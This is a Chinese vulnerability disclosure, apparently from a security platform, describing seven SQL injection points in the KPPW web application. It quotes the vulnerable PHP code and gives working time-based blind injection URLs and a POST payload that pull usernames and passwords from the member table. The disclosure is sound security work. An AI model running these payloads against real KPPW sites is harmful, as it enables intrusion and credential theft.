### 简要描述:
KPPW最新版SQL注入漏洞七(多处不同注入点)
### 详细说明:
KPPW最新版SQL注入漏洞七,多处不同注入点
第一处sql注入:
文件/control/user/transaction_works.php:
```
if($action == 'delete_image'){
$strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid);
$arrFileInfo = db_factory::get_one($strSql);
$resText = CommonClass::delFileByFileId($fileid);
if($resText){
$array = explode(',', $arrServiceInfo['pic']);
$newArr = CommonClass::returnNewArr($arrFileInfo['save_name'], $array);
$_POST['file_ids'] = implode(",", $newArr);
updateFilepath($arrServiceInfo['service_id'], $_POST['file_ids'], 'pic');
kekezu::echojson('删除成功',1,array('fileid'=>$fileid,'save_name'=>$arrFileInfo['save_name']));die;
}
}
```
注意这里:
```
$strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid);
```
$fileid没有引号保护进入sql语句,导致存在注入
第二,三处sql注入:
继续看下面的:
```
$resText = CommonClass::delFileByFileId($fileid);
```
$fileid继续进入了函数delFileByFileId,跟进函数delFileByFileId:
文件:/lib/inc/CommonClass.php
```
public static function delFileByFileId($fileId){
$strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileId);
$arrFileInfo = db_factory::get_one($strSql);
$filename = S_ROOT.$arrFileInfo['save_name'];
if(file_exists($filename)){
unlink($filename);
}
return db_factory::execute("delete from ".TABLEPRE."witkey_file where file_id = ".$fileId);
}
```
这里存在两处注入,$fileid变量进入select和delete语句都没有处理,导致sql注入
第四,五,六处sql注入:
同意的问题出现在文件/control/user/transaction_works.php:
```
if($action == 'delete_goodsfile'){
$strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid);
$arrFileInfo = db_factory::get_one($strSql);
$resText = CommonClass::delFileByFileId($fileid);
if($resText){
$array = explode(',', $arrServiceInfo['file_path']);
$newArr = CommonClass::returnNewArr($arrFileInfo['save_name'], $array);
$_POST['file_path_2'] = implode(",", $newArr);
updateFilepath($arrServiceInfo['service_id'], $_POST['file_path_2'], 'file');
kekezu::echojson('删除成功',1,array('fileid'=>$fileid,'save_name'=>$arrFileInfo['save_name']));die;
}
}
```
这里的问题跟上面分析的问题一样,存在注入。
第七处sql注入:
文件/control/user/transaction_works.php:
```
if (isset($formhash)&&kekezu::submitcheck($formhash)) {
$arrGoodsConfig = unserialize($kekezu->_model_list[6]['config']);
$goodsprice = floatval($goodsprice);
$floatMinCash = floatval($arrGoodsConfig['min_cash']);
if($floatMinCash&&($goodsprice < $floatMinCash)){
$tips['errors']['goodsprice'] = '最小金额不能少于'.$floatMinCash.'元';
kekezu::show_msg($tips,null,NULL,NULL,'error');
}
if (strtoupper ( CHARSET ) == 'GBK') {
$goodsname = kekezu::utftogbk($goodsname );
$goodsdesc = kekezu::utftogbk($goodsdesc );
$unite_price = kekezu::utftogbk($unite_price );
}
$arrData = array(
'model_id' => $arrServiceInfo['model_id']?$arrServiceInfo['model_id']:6,
'uid' => $gUid,
'username' => $gUserInfo['username'],
'indus_id' => $indus_id,
'indus_pid' => $indus_pid,
'title' => $goodsname,
'price' => $goodsprice,
'pic' => $file_ids,
'content' => $goodsdesc,
'unite_price' => $unite_price,
'submit_method' => $submit_method,
'file_path' => $file_path_2,
'confirm_max' => intval($arrGoodsConfig['confirm_max_day'])
);
if(!$pk['service_id']){
$arrData['profit_rate'] = $arrGoodsConfig['service_profit'];
$arrData['on_time'] = time();
$arrData['service_status'] = 2;
}
$objServiceT = new keke_table_class ( 'witkey_service' );
$objServiceT->save ( $arrData,$pk);
unset($objServiceT);
if ($objId&&$intTaskId) {
$strBidSql = ' UPDATE `'.TABLEPRE.'witkey_task_bid` SET `hasdel`=1 WHERE (`bid_id` ='.$objId.') and task_id = '.$intTaskId;
$strWorkSql = ' UPDATE `'.TABLEPRE.'witkey_task_work` SET `hasdel`=1 WHERE (`work_id`='.$objId.') and task_id = '.$intTaskId;
db_factory::execute($strBidSql);
db_factory::execute($strWorkSql);
}
kekezu::show_msg('操作成功',$strJumpUrl,NULL,NULL,'ok');
}
```
注意这里的:
```
$objServiceT->save ( $arrData,$pk);
```
这里的变量$pk进入了save函数,跟进save函数
文件/lib/inc/keke_table_class.php:
```
function save($fields, $pk = array()) {
foreach ( $fields as $k => $v ) {
$kk = ucfirst ( $k );
$set_query = "set" . $kk;
$this->_table_obj->$set_query ( $v );
}
$keys = array_keys ( $pk );
$key = $keys [0];
//echo $key."\n";
//print_r($pk);
//echo $pk[$key];
if (! empty ( $pk [$key] )) {
$this->_table_obj->setWhere ( " $key = '" . $pk [$key] . "'" );
$edit_query = "edit_" . $this->_pre . $this->_table_name;
$res = $this->_table_obj->$edit_query ();
} else {
$create_query = "create_" . $this->_pre . $this->_table_name;
$res = $this->_table_obj->$create_query ();
}
if ($res) {
return $res;
} else {
return false;
}
}
```
最后$pk的key进入了setWhere条件语句中,导致sql注入
### 漏洞证明:
第一处SQL注入:
```
http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork&action=delete_image&fileid=5566) and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)%23
```
这里会延迟5秒返回,说明UserName第一个字符为a,继续即可注入出用户信息
第二,三处SQL注入:
```
http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork&action=delete_image&fileid=5566 and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)
```
这里会延迟5秒返回,说明UserName第一个字符为a,继续即可注入出用户信息
[<img src="https://images.seebug.org/upload/201412/08225401a02eaa8ba1f8c147291609bea094275c.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/08225401a02eaa8ba1f8c147291609bea094275c.png)
第七处SQL注入:
```
http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork
formhash=6cb7d4&objId=0&pk%5Bservice_id=1+and+1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)%23%5D=222222&goodsname=111&goodsdesc=111&indus_pid=249&indus_id=-1&upload=&file_ids=&goodsprice=111&unite_price=%E4%B8%AA&submit_method=outside&file_upload_i=&file_path_2=
```
这里会延迟5秒返回,说明UserName第一个字符为a,继续即可注入出用户信息
京公网安备 11010502034610号
暂无评论